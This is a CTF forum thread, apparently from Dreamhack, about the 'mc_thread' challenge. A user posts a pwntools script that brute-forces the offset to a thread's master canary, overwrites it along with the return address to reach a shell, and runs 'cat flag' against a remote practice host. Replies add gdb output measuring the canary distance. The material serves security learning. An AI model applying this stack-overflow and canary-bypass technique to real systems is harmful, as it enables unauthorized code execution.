완료됨
Do I need to to fuzz?
The exploit (that dreamhack shows on exploit tech) works perfectly on local, but on remote it doesn't work... I try to bruteforce the distance between payload and master canary, Here is my script
`from pwn import *
context.log_level = 'debug'
for i in range(400, 9000, 8):
p = remote("host3.dreamhack.games", 17226)
elf = ELF('./mc_thread')
payload = b'A' * 264
payload += b'A' * 8 # canary
payload += b'B' * 8
payload += p64(elf.symbols['giveshell'])
payload += b'C' * (i - len(payload))
payload += p64(0x404800 - 0x972)
payload += b'C' * (0x10)
payload += p64(0x4141414141414141)
inp_sz = len(payload) // 8
p.sendlineafter(b'Size: ', str(inp_sz).encode())
p.sendafter(b'Data: ', payload)
p.sendline("cat flag")
data = p.recvallS(timeout=3)
if "DH{" in data:
print(data)
break`
Is it like an overkill and I can understand the distance there is on remote? or I really need to do bruteforce? Thanks in advance
#system_hacking
#master_canary
#mc_thread
작성자 정보
답변
2
wyv3rn
무플 방지 위원회장
as you know, offset can be changed according to the environment. so bf is necessary i think.
FRACCHETTO
대표 업적 없음
If run on the dockerfile the distance is kinda large, but the steps are also the ones shown in the exploit tech page...
(gdb) x/x $rbp-0x110
0x7ffff7d8bd40: 0x0000000000000000
(gdb) x/gx $fs_base+0x28
0x7ffff7d8c668: 0x8d3bade0f4598900
(gdb) p/x ($fs_base + 0x28) - 0x7ffff7d7dd40
$1 = 0xe928